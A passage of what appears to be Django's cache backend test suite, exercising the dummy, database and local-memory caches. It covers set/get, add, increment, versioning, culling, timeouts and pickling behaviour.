"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertIsNone(cache.get("key1"))
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
